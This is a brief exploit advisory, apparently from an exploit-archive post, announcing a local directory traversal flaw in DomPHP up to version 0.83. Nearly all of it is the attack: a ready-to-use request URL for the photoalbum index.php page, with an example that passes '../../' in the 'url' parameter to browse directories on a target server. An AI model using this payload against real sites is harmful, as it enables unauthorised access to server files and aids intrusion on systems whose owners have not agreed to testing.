DomPHP <= 0.83 - Local Directory Traversal Vulnerability



-------------------------------------------------------------

DomPHP <= v0.83 Local Directory Traversal Vulnerability 
-------------------------------------------------------------
 
= Author : Houssamix                       
= Script : DomPHP <= v0.83
                    
= Download : http://www.domphp.com/download/  
            
= BUG :  Local Directory Traversal Vulnerability 
 
= Exploit :                               
http://[target]/photoalbum/index.php?urlancien=&url=[Directory]
                 
Exemple :                  
http://target.com/photoalbum/index.php?urlancien=&url=../../